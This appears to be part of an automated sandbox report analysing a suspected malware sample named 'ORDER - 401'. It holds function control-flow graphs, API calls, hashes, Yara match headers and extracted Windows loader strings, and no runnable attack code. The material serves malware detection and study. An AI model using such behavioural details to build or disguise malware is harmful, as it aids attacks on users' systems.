• Instruction Fuzzy Hash: 9990027120158802E1107158C40474E000997D0301F59C412A8824658DC69589917221

APIs
Memory Dump Source
• Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
• Instruction ID: 1de1848c147d3820c1081a185db8e7bbd2e160c6197a4d5712a12667ff670a3f
• Opcode Fuzzy Hash: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
• Instruction Fuzzy Hash: D790027160560402E1007158851470A100997D0201F65C412A4824568DC7958A5166A2

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 0: 4145a8-4145ae
• 1: 4145b0-4145c4
• 2: 414628-414641
• 3: 414663-414668
• 4: 414643-414654, PostThreadMessageW
• 5: 414656-414660
• edges: 0->1, 0->2, 2->3, 2->4, 4->3, 4->5, 5->3
APIs
• PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
(The message value 0x00000111 is WM_COMMAND.)
Strings
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 04I_$086604I_P$086604I_P
• API String ID: 1836367815-762223272
• Opcode ID: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
• Instruction ID: 7364b2b1fcad01788479a4f9307d5c54d4abcef8cf499afca70ead5bc7e82b5e
• Opcode Fuzzy Hash: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
• Instruction Fuzzy Hash: 59F02B32B0534C75D71186549C41FFEBB68DF82B18F0402DAE904AA140D679190687D5

Control-flow Graph

APIs
• PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
Strings
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 086604I_P$086604I_P
• API String ID: 1836367815-368392577
• Opcode ID: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
• Instruction ID: 3b1c6bc8a4282993d6e4a2e48ae66367294b2a1ba01f1a571c31a1870c0ceae8
• Opcode Fuzzy Hash: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
• Instruction Fuzzy Hash: 25112972D8021C76E711A6919C42FDF7B7C8F81B58F404169FA047B2C0D6B85A0687E9

Control-flow Graph

APIs
• PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
Strings
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 086604I_P$086604I_P
• API String ID: 1836367815-368392577
• Opcode ID: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
• Instruction ID: 0fb9ab954ef8db3f32d4c25afcf056a5d19c50fc272c64c350af8f6a8d246f1f
• Opcode Fuzzy Hash: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
• Instruction Fuzzy Hash: CA01D671E4025876EB21A6919C42FDF7B7C9F81B58F014169FA047B2C0D6BC5A0687E9

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 231: 417e46-417e49
• 232: 417dd8-417de1
• 233: 417e4b-417e52
• 234: 417de3-417df7, LdrLoadDll
• 235: 417dfa-417dfd
• 236: 417e54-417e68
• 237: 417e3a-417e3c
• 240: 417e69-417e7a
• 238: 417e3f-417e41
• 239: 417e3e
• 241: 417e01-417e02
• 242: 417e43-417e44
• 244: 417e7b-417e9b
• 245: 417e9d-417e9f
• 246: 417ea1
• 247: 417eff-417f3e, call 42f933, call 42bcb3
• 248: 417ea3-417ea5
• edges: 231->232, 231->233, 232->234, 232->235, 233->236, 233->237, 234->235, 236->240, 237->238, 237->239, 238->241, 238->242, 239->238, 240->244, 244->244, 244->245, 245->246, 245->247, 246->240, 246->248, 248->247
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
• Instruction ID: 6fda3640aeabacdf2414ac2a0c0e5c28ef028ee1734c6d5c1d6e7c4e4c655ad8
• Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
• Instruction Fuzzy Hash: 0021BE7554D3895ACB11DBA4CC80BDEBB74DF46328F0443DEE444CF282D664D94583D5

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 273: 42d003-42d044, call 404623, call 42dea3, RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
• Instruction ID: 480c2476483c24a98dc1ccd4d3f8387b92b9bc50a10ea559d801330f157754dd
• Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
• Instruction Fuzzy Hash: CCE065B66046147FE710EFA9EC41E9B33ACEFC9710F00041AFA08A7241D778B9108AB9

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 268: 42cfb3-42cff4, call 404623, call 42dea3, RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
• Instruction ID: dc73a00d5b2d417b2c46dafea40d9adc71060332ee157e8bfc2b2fc429177c5c
• Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
• Instruction Fuzzy Hash: 2DE06DB66042047BD610EE59EC41E9B33ACDFC9710F000819F908A7241D675BA118BB9

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                  • Instruction ID: 7a9833e9e4d947a3999cb396ff3879e5195884ea37e196f788b44d0b0899353c
                                                                                  • Opcode Fuzzy Hash: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                  • Instruction Fuzzy Hash: D2E04F722406147BC210FA5ADC02F9B775CDBC5715F10845AFA086B241D7B9791587A8

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 288 1052c0a-1052c0f 289 1052c11-1052c18 288->289 290 1052c1f-1052c26 LdrInitializeThunk 288->290
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
                                                                                  • Instruction ID: 9cd64cdc25ced82c0dcf1a48b3e5546e7cde67a075881a1cb05936c76589ce8c
                                                                                  • Opcode Fuzzy Hash: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
                                                                                  • Instruction Fuzzy Hash: 06B09B719015C5C5EB51E764460871B7D447BD0701F15C062D6430641F4738C1D1E275
                                                                                  Strings
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010C8F26
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010C8DA3
                                                                                  • *** enter .cxr %p for the context, xrefs: 010C8FBD
                                                                                  • The resource is owned shared by %d threads, xrefs: 010C8E2E
                                                                                  • The instruction at %p tried to %s , xrefs: 010C8F66
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 010C8F3F
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010C8FEF
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 010C8EE2
                                                                                  • *** then kb to get the faulting stack, xrefs: 010C8FCC
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 010C8E02
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 010C8E75
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 010C8E24
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010C8E86
                                                                                  • This failed because of error %Ix., xrefs: 010C8EF6
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010C8F2D
                                                                                  • <unknown>, xrefs: 010C8D2E, 010C8D81, 010C8E00, 010C8E49, 010C8EC7, 010C8F3E
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010C8F34
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010C8DC4
                                                                                  • *** Inpage error in %ws:%s, xrefs: 010C8EC8
                                                                                  • The critical section is owned by thread %p., xrefs: 010C8E69
                                                                                  • read from, xrefs: 010C8F5D, 010C8F62
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010C8D8C
                                                                                  • a NULL pointer, xrefs: 010C8F90
                                                                                  • an invalid address, %p, xrefs: 010C8F7F
                                                                                  • write to, xrefs: 010C8F56
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010C8DB5
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010C8DD3
                                                                                  • *** enter .exr %p for the exception record, xrefs: 010C8FA1
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010C8E4B
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010C8E3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  • Opcode ID: c676f0a97e0958132c43945f6947e46c37b377be9b2711b0b98abf782bfb4637
                                                                                  • Instruction ID: 6160949142ef42793e9f1665cdfd614ac5de0723571b9f238261840277937d9c
                                                                                  • Opcode Fuzzy Hash: c676f0a97e0958132c43945f6947e46c37b377be9b2711b0b98abf782bfb4637
                                                                                  • Instruction Fuzzy Hash: EB81D575A40202BFEB17AB198C45EAF3F75EB56F14F01408EF284AF192E3B18452DE65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
                                                                                  • Instruction ID: 23b23b9de623d20c386e6890c4f39f98deda043d8bd214e75d51ee16ad405cb6
                                                                                  • Opcode Fuzzy Hash: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
                                                                                  • Instruction Fuzzy Hash: 03929F71604346AFEB25DE28C890BABB7E8BF84754F04492DFAD4D7290D770E844DB92
                                                                                  Strings
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854E2
                                                                                  • double initialized or corrupted critical section, xrefs: 01085508
                                                                                  • Thread identifier, xrefs: 0108553A
                                                                                  • Critical section debug info address, xrefs: 0108541F, 0108552E
                                                                                  • undeleted critical section in freed memory, xrefs: 0108542B
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0108540A, 01085496, 01085519
                                                                                  • Critical section address, xrefs: 01085425, 010854BC, 01085534
                                                                                  • 8, xrefs: 010852E3
                                                                                  • Address of the debug info found in the active list., xrefs: 010854AE, 010854FA
                                                                                  • Critical section address., xrefs: 01085502
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854CE
                                                                                  • corrupted critical section, xrefs: 010854C2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01085543
                                                                                  • Invalid debug info address of this critical section, xrefs: 010854B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
                                                                                  • Instruction ID: 5fb72dc33cf5564258d64d438d95af4cd63355e6d8a01fc63facbb3b368e7451
                                                                                  • Opcode Fuzzy Hash: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
                                                                                  • Instruction Fuzzy Hash: F581AEB1A04349AFDB61DF99CC40BAEBBF5BF08B14F108159F684B7290D7B1A941DB60
                                                                                  Strings
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010825EB
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010822E4
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01082624
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01082506
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0108261F
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01082409
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010824C0
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01082498
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01082412
                                                                                  • @, xrefs: 0108259B
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01082602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
                                                                                  • Instruction ID: e47ff706b8a75c50d3f38e7557fc8c02843b22455a18a3b96fa30ce760a0aa08
                                                                                  • Opcode Fuzzy Hash: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
                                                                                  • Instruction Fuzzy Hash: 7A0240F1D0422D9BDB61DB54CD80BEEB7B8AF54304F4041EAA689A7241DB709E84CF69
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
                                                                                  • Instruction ID: c4ff00c2bf77adb9137d6e194a66e92faadfd885de5dd8e3da4816ba9e81b2df
                                                                                  • Opcode Fuzzy Hash: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
                                                                                  • Instruction Fuzzy Hash: E951B1B15083469BD325EF198888BEBBBECEF94740F14891FA9D8C3251E770D604CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-3197712848
                                                                                  • Opcode ID: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
                                                                                  • Instruction ID: bbfb40b15e932c023de57e43e9412e54164e2fc941e47e395f823400469e7f38
                                                                                  • Opcode Fuzzy Hash: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
                                                                                  • Instruction Fuzzy Hash: 06121371A08362CFD765DF18C480BAAB7E4BF84704F04496EF9C58B291EB74D945CB92
                                                                                  Strings
                                                                                  • VerifierDebug, xrefs: 01098CA5
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01098B8F
                                                                                  • VerifierDlls, xrefs: 01098CBD
                                                                                  • HandleTraces, xrefs: 01098C8F
                                                                                  • VerifierFlags, xrefs: 01098C50
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01098A67
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01098A3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
                                                                                  • Instruction ID: d67516393db5b90991ebad58abaeb8b720d7b577b5eca6ef36768f1138d3f52e
                                                                                  • Opcode Fuzzy Hash: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
                                                                                  • Instruction Fuzzy Hash: A991597190534AEFDB26EF2888A0B5B77E5AF55714F04846AFAC06B391C7B0EC40DB91
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
                                                                                  • Instruction ID: 8687a7e7377ecca482ead4cdfe979fa9efa4c5e209b8036748b6ab131496f3de
                                                                                  • Opcode Fuzzy Hash: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
                                                                                  • Instruction Fuzzy Hash: 86A24870E0562A8BDBA5CF18CC88BADBBB5BF45304F1442E9D98DA7254DB349E85CF04
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
                                                                                  • Instruction ID: 589a514ada8af8da34baca7e1b346c4689185d30843ee17ba0c2343a25147eda
                                                                                  • Opcode Fuzzy Hash: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
                                                                                  • Instruction Fuzzy Hash: C6913A70F04316DBEF6AEF58D884BAE7BA1BF51B14F000179D5D0AB281EBB59441C791
                                                                                  Strings
                                                                                  • LdrpInitShimEngine, xrefs: 010699F4, 01069A07, 01069A30
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010699ED
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01069A11, 01069A3A
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01069A2A
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01069A01
                                                                                  • apphelp.dll, xrefs: 01006496
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
                                                                                  • Instruction ID: c63017270b25ac036f868a5b30b027d539f86c76f5dd9e47d6968eda96de208c
                                                                                  • Opcode Fuzzy Hash: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
                                                                                  • Instruction Fuzzy Hash: 5E51DF716183089FE726DF24C841AAF77E9FF84748F000929F6D59B1A0D771E944CB92
                                                                                  Strings
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01082178
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010821BF
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01082160, 0108219A, 010821BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01082165
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01082180
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0108219F
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
                                                                                  • Instruction ID: 3796e51e00860c5eeba2729cd5e55dfe212cc2a7fa186ec0e3070dc6e25b9ee1
                                                                                  • Opcode Fuzzy Hash: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
                                                                                  • Instruction Fuzzy Hash: 68315B76B4031577EB21EA999C81F6E7E78EF64B90F1500A9BB80A7150D270DA00D2A1
                                                                                  Strings
